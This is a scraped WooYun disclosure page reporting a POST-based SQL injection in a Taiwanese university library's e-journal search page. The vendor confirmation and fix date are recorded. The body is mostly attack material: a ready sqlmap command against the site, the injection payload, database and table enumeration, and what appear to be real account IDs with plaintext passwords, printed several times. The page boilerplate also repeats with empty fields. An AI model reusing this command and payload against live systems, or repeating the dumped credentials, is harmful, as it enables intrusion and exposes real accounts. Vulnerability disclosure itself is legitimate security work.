國立臺中科技大學圖書館存在POST型SQL註射漏洞（數萬系統信息，備份文件+用戶密碼明文密碼）（臺灣地區）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0156854

漏洞标题：國立臺中科技大學圖書館存在POST型SQL註射漏洞（數萬系統信息，備份文件+用戶密碼明文密碼）（臺灣地區）

漏洞作者：路人甲

提交时间：2015-12-01 11:31

修复时间：2016-01-05 19:08

公开时间：2016-01-05 19:08

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-01：细节已通知厂商并且等待厂商处理中
2015-12-02：厂商已经确认，细节仅向厂商公开
2015-12-12：细节向核心白帽子及相关领域专家公开
2015-12-22：细节向普通白帽子公开
2016-01-01：细节向实习白帽子公开
2016-01-05：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

一、願景
以培育立型人才為理念，提供專業的圖書館服務，營造學院整合、協同成長之學習環境。

二、目標
1. 空間─營造優質空間
2. 館藏─建構完整資源
3. 專業─精進專業知能
4. 管理─提升管理成效
5. 數位─強化數位內容
6. 服務─提供精緻服務

详细说明：

地址：http://**.**.**.**/database/search/ejournal/JournalList_user.asp

$ python sqlmap.py -u "http://**.**.**.**/database/search/ejournal/JournalList_user.asp" -p Language --technique=BE --form --random-agent --batch -D EDB -T Main -C ID,Password --dump

Database: master
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| sys.messages                                     | 98318   |
| sys.sysmessages                                  | 98318   |

Database: msdb
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.backupfile                                   | 13660   |

Database: EDB
Table: Main
[9 entries]
+-------------+-----------------+
| ID          | Password        |
+-------------+-----------------+
| 100325531   | camiojc         |
| 103udndata  | 103udndata      |
| college93   | college93       |
| guest       | guest           |
| ntit        | ntitlib         |
| reviewer    | 4filibusters356 |
| taiwantrial | 2010trial       |
| user0011    | user0011        |
| 自訂          | 自訂              |
+-------------+-----------------+

漏洞证明：

---
Parameter: Language (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: MoveUp=%E4%B8%8A%E4%B8%80%E9%A0%81&ListType=QAsR&ListString=&DisplayNumber=20&Language=djEV' AND 9659=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (9659=9659) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(120)+CHAR(113))) AND 'hHLx'='hHLx&select_way=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2008
current user:    'edbsa1'
current user is DBA:    False
database management system users [2]:
[*] edbsa1
[*] sa
database management system users password hashes:
[*] edbsa1 [1]:
    password hash: NULL
[*] sa [1]:
    password hash: NULL
Database: EDB
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.ClassifiedByCollege                          | 1248    |
| dbo.ClassifiedBySubject                          | 1009    |
| dbo.ClassifiedByDataType                         | 537     |
| dbo.Main                                         | 472     |
| dbo.Main_20150128                                | 434     |
| dbo.ClassifiedByCollege_20120209                 | 332     |
| dbo.TrialSurveyDept                              | 41      |
| dbo.DataType                                     | 22      |
| dbo.IDAskFor                                     | 17      |
| dbo.Subject                                      | 7       |
| dbo.College                                      | 6       |
| dbo.DatabaseType                                 | 6       |
| dbo.FunctionName                                 | 6       |
| dbo.JournalCoverage                              | 6       |
| dbo.Status                                       | 6       |
| dbo.College_20120209                             | 5       |
| dbo.Survey                                       | 5       |
| dbo.AccessArea                                   | 4       |
| dbo.Platform                                     | 3       |
| dbo.Proxy                                        | 3       |
+--------------------------------------------------+---------+
Database: EJournal
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.Main                                         | 73130   |
| dbo.Main_9                                       | 70765   |
| dbo.Main_20140121                                | 63236   |
| dbo.Main_20150420                                | 59129   |
| dbo.main_20120928                                | 56744   |
| dbo.main_20110629                                | 34278   |
| dbo.sheet1$                                      | 30699   |
| dbo.電子期刊上傳_BSC2015                                     | 20395   |
| dbo.電子期刊上傳_華藝                                            | 13179   |
| dbo.電子期刊上傳_CJTD2015                                    | 8545    |
| dbo.電子期刊上傳_萬方期刊清單7774刊                                        | 7774    |
| dbo.電子期刊上傳_ASP2015                                     | 6126    |
| dbo.電子期刊上傳_CEPS2015                                    | 4634    |
| dbo.電子期刊上傳_Ecolit2015                                  | 3042    |
| dbo.電子期刊上傳_OmniFile2015                                | 2862    |
| dbo.電子期刊上傳_SDOL2015                                    | 2221    |
| dbo.電子期刊清單_SDOL                                        | 2221    |
| dbo.電子期刊上傳_ASTS2015                                    | 1598    |
| dbo.電子期刊上傳_Medline2015                                 | 1458    |
| dbo.西文電子期刊上傳_ABIR                                        | 1343    |
| dbo.電子期刊上傳_ABIR2015                                    | 1343    |
| dbo.ACM                                          | 1140    |
| dbo.電子期刊上傳_ACM                                         | 1140    |
| dbo.電子期刊上傳_Hyread2015                                  | 1136    |
| dbo.西文電子期刊上傳_EJ                                          | 1119    |
| dbo.電子期刊上傳_EJ2015                                      | 1119    |
| dbo.西文電子期刊清單VSP                                          | 1011    |
| dbo.CJFD期刊清單                                         | 846     |
| dbo.[電子期刊上傳_PQ-Nursing2015]                            | 793     |
| dbo.ProQuest                                     | 793     |
| dbo.電子期刊上傳_CINAHL2015                                  | 760     |
| dbo.電子期刊上傳_PDC2015                                     | 709     |
| dbo.電子期刊上傳_CMMC2015                                    | 642     |
| dbo.電子期刊上傳_JSTOR2015                                   | 600     |
| dbo.電子期刊上傳_PAO                                         | 547     |
| dbo.電子期刊上傳_Library2015                                 | 368     |
| dbo.電子期刊上傳_SOJA                                        | 259     |
| dbo.電子期刊上傳_MagV2015                                    | 170     |
| dbo.電子期刊上傳_摩達網                                            | 170     |
| dbo.[電子期刊上傳-華藝雜誌124種]                                       | 124     |
| dbo.電子期刊上傳_WSPC2015                                    | 116     |
| dbo.[0522_EM60-2015]                             | 80      |
| dbo.電子期刊上傳_OJDA                                        | 71      |
| dbo.DB                                           | 63      |
| dbo.電子期刊上傳_華藝雜誌                                            | 37      |
| dbo.[IEEE CSDL]                                  | 35      |
| dbo.[電子期刊上傳_IEEE CSDL]                                 | 35      |
| dbo.電子期刊上傳_Acer2015                                    | 27      |
| dbo.[電子期刊上傳_2016中文電子期刊清單-Hyread-app]                           | 18      |
| dbo.電子期刊上傳_GreenFILE2015                               | 14      |
| dbo.Source                                       | 12      |
| dbo.電子期刊上傳_華藝精選電子雜誌                                            | 10      |
| dbo.西文電子期刊上傳_vogue                                       | 1       |
+--------------------------------------------------+---------+
Database: master
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| sys.messages                                     | 98318   |
| sys.sysmessages                                  | 98318   |
| sys.fulltext_system_stopwords                    | 15829   |
| sys.syscolumns                                   | 11966   |
| sys.all_parameters                               | 7090    |
| sys.system_parameters                            | 7090    |
| sys.trace_subclass_values                        | 5366    |
| sys.all_columns                                  | 4670    |
| sys.system_columns                               | 4626    |
| sys.trace_event_bindings                         | 4304    |
| sys.syscomments                                  | 2994    |
| dbo.spt_values                                   | 2508    |
| sys.all_objects                                  | 1934    |
| sys.sysobjects                                   | 1934    |
| sys.system_objects                               | 1928    |
| sys.database_permissions                         | 1844    |
| sys.syspermissions                               | 1844    |
| sys.sysprotects                                  | 1843    |
| sys.all_sql_modules                              | 1783    |
| sys.system_sql_modules                           | 1783    |
| sys.dm_audit_actions                             | 454     |
| sys.spatial_reference_systems                    | 390     |
| sys.event_notification_event_types               | 365     |
| sys.all_views                                    | 354     |
| sys.system_views                                 | 354     |
| sys.trigger_event_types                          | 245     |
| sys.trace_events                                 | 180     |
| sys.allocation_units                             | 128     |
| sys.partitions                                   | 116     |
| sys.syscharsets                                  | 114     |
| sys.xml_schema_facets                            | 112     |
| sys.xml_schema_components                        | 99      |
| sys.system_components_surface_area_configuration | 95      |
| sys.dm_audit_class_type_map                      | 83      |
| sys.xml_schema_types                             | 82      |
| sys.configurations                               | 68      |
| sys.sysconfigures                                | 68      |
| sys.syscurconfigs                                | 68      |
| sys.trace_columns                                | 66      |
| INFORMATION_SCHEMA.COLUMNS                       | 44      |
| sys.columns                                      | 44      |
| sys.systypes                                     | 34      |
| sys.types                                        | 34      |
| sys.syslanguages                                 | 33      |
| sys.securable_classes                            | 22      |
| sys.trace_categories                             | 21      |
| sys.xml_schema_component_placements              | 18      |
| sys.xml_schema_attributes                        | 15      |
| sys.database_principals                          | 14      |
| sys.sysusers                                     | 14      |
| INFORMATION_SCHEMA.SCHEMATA                      | 13      |
| sys.database_mirroring                           | 13      |
| sys.database_recovery_status                     | 13      |
| sys.databases                                    | 13      |
| sys.schemas                                      | 13      |
| sys.sysdatabases                                 | 13      |
| sys.server_principals                            | 11      |
| sys.service_contract_message_usages              | 11      |
| sys.server_permissions                           | 7       |
| sys.sysindexes                                   | 7       |
| sys.indexes                                      | 6       |
| sys.objects                                      | 6       |
| sys.stats_columns                                | 6       |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES              | 5       |
| INFORMATION_SCHEMA.TABLES                        | 5       |
| sys.index_columns                                | 5       |
| sys.sysindexkeys                                 | 5       |
| sys.tables                                       | 5       |
| sys.endpoints                                    | 4       |
| sys.assembly_types                               | 3       |
| sys.service_queue_usages                         | 3       |
| sys.stats                                        | 3       |
| sys.type_assembly_usages                         | 3       |
| sys.xml_schema_namespaces                        | 3       |
| sys.database_files                               | 2       |
| sys.login_token                                  | 2       |
| sys.service_contract_usages                      | 2       |
| sys.sql_logins                                   | 2       |
| sys.sysfiles                                     | 2       |
| sys.syslogins                                    | 2       |
| sys.user_token                                   | 2       |
| dbo.spt_monitor                                  | 1       |
| sys.assemblies                                   | 1       |
| sys.assembly_files                               | 1       |
| sys.data_spaces                                  | 1       |
| sys.database_role_members                        | 1       |
| sys.default_constraints                          | 1       |
| sys.dm_exec_requests                             | 1       |
| sys.dm_exec_sessions                             | 1       |
| sys.filegroups                                   | 1       |
| sys.server_role_members                          | 1       |
| sys.servers                                      | 1       |
| sys.sysconstraints                               | 1       |
| sys.sysfilegroups                                | 1       |
| sys.sysmembers                                   | 1       |
| sys.sysprocesses                                 | 1       |
| sys.sysservers                                   | 1       |
| sys.tcp_endpoints                                | 1       |
| sys.via_endpoints                                | 1       |
| sys.xml_schema_collections                       | 1       |
| sys.xml_schema_model_groups                      | 1       |
| sys.xml_schema_wildcards                         | 1       |
+--------------------------------------------------+---------+
Database: msdb
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.backupfile                                   | 13660   |
| dbo.backupmediafamily                            | 6830    |
| dbo.backupmediaset                               | 6830    |
| dbo.backupset                                    | 6830    |
| dbo.syspolicy_configuration                      | 4       |
| dbo.restorefile                                  | 2       |
| dbo.restorefilegroup                             | 1       |
| dbo.restorehistory                               | 1       |
+--------------------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: EDB
Table: Main
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| Password | varchar |
+----------+---------+
Database: EDB
Table: Main_20150128
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| Password | varchar |
+----------+---------+
Database: master
Table: sysoledbusers
[1 column]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| rmtpassword | nvarchar |
+-------------+----------+
Database: master
Table: syslogins
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | nvarchar |
+----------+----------+
Database: master
Table: sysusers
[1 column]
+----------+-----------+
| Column   | Type      |
+----------+-----------+
| password | varbinary |
+----------+-----------+
Database: master
Table: sql_logins
[1 column]
+---------------+-----------+
| Column        | Type      |
+---------------+-----------+
| password_hash | varbinary |
+---------------+-----------+
Database: msdb
Table: backupset
[1 column]
+-----------------------+------+
| Column                | Type |
+-----------------------+------+
| is_password_protected | bit  |
+-----------------------+------+
Database: msdb
Table: backupmediaset
[1 column]
+-----------------------+------+
| Column                | Type |
+-----------------------+------+
| is_password_protected | bit  |
+-----------------------+------+
Database: EDB
Table: Main
[9 entries]
+-----------------+
| Password        |
+-----------------+
| 103udndata      |
| 2010trial       |
| 4filibusters356 |
| camiojc         |
| college93       |
| guest           |
| ntitlib         |
| user0011        |
| 自訂              |
+-----------------+
Database: EDB
Table: Main_20150128
[9 entries]
+-----------------+
| Password        |
+-----------------+
| 103udndata      |
| 2010trial       |
| 4filibusters356 |
| camiojc         |
| college93       |
| guest           |
| ntitlib         |
| user0011        |
| 自訂              |
+-----------------+
Database: msdb
Table: backupset
[1 entry]
+-----------------------+
| is_password_protected |
+-----------------------+
| 0                     |
+-----------------------+
Database: msdb
Table: backupmediaset
[1 entry]
+-----------------------+
| is_password_protected |
+-----------------------+
| 0                     |
+-----------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Language (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: MoveUp=%E4%B8%8A%E4%B8%80%E9%A0%81&ListType=QAsR&ListString=&DisplayNumber=20&Language=djEV' AND 9659=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (9659=9659) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(120)+CHAR(113))) AND 'hHLx'='hHLx&select_way=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2008
Database: EDB
Table: Main
[40 columns]
+-----------------------+----------+
| Column                | Type     |
+-----------------------+----------+
| AccessAreaNum         | int      |
| AccessMode            | varchar  |
| AllocatedDisk         | varchar  |
| Annotate              | nvarchar |
| Back_up               | char     |
| BackupYear            | varchar  |
| ConcurrentUser        | nvarchar |
| DatabaseType          | varchar  |
| DataCoverage          | nvarchar |
| Deadline              | datetime |
| Domain                | varchar  |
| EarlyCDROM            | char     |
| EarlyCDROMYear        | varchar  |
| ErrorConnection       | int      |
| FulltextViewer        | varchar  |
| Guide                 | nvarchar |
| ID                    | varchar  |
| IDAskForNum           | int      |
| InvalidAccessdatetime | datetime |
| Item                  | int      |
| Language              | nvarchar |
| Movie                 | nvarchar |
| Note                  | nvarchar |
| OperationSystem       | varchar  |
| Password              | varchar  |
| PlatformNum           | int      |
| Producer              | nvarchar |
| ProxyNum              | int      |
| SharedFolder          | varchar  |
| Sort                  | char     |
| Source                | varchar  |
| StatusNum             | int      |
| SubjectCoverage       | nvarchar |
| SurveyNum             | int      |
| SurveyURL             | varchar  |
| TimeCoverage          | nvarchar |
| Title                 | nvarchar |
| Updatedate            | datetime |
| UpdateFrequency       | varchar  |
| Vendor                | varchar  |
+-----------------------+----------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Language (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: MoveUp=%E4%B8%8A%E4%B8%80%E9%A0%81&ListType=QAsR&ListString=&DisplayNumber=20&Language=djEV' AND 9659=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (9659=9659) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(120)+CHAR(113))) AND 'hHLx'='hHLx&select_way=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2008
Database: EDB
Table: Main
[9 entries]
+-------------+-----------------+
| ID          | Password        |
+-------------+-----------------+
| 100325531   | camiojc         |
| 103udndata  | 103udndata      |
| college93   | college93       |
| guest       | guest           |
| ntit        | ntitlib         |
| reviewer    | 4filibusters356 |
| taiwantrial | 2010trial       |
| user0011    | user0011        |
| 自訂          | 自訂              |
+-------------+-----------------+

修复方案：

上WAF。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-12-02 15:56

厂商回复：

感謝通報

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0156854

漏洞标题：國立臺中科技大學圖書館存在POST型SQL註射漏洞（數萬系統信息，備份文件+用戶密碼明文密碼）（臺灣地區）

相关厂商：國立臺中科技大學圖書館

漏洞作者：路人甲

提交时间：2015-12-01 11:31

修复时间：2016-01-05 19:08

公开时间：2016-01-05 19:08

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0156854

漏洞标题：國立臺中科技大學圖書館存在POST型SQL註射漏洞（數萬系統信息，備份文件+用戶密碼明文密碼）（臺灣地區）

相关厂商：國立臺中科技大學圖書館

漏洞作者： 路人甲

提交时间：2015-12-01 11:31

修复时间：2016-01-05 19:08

公开时间：2016-01-05 19:08

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态： 已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0156854"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云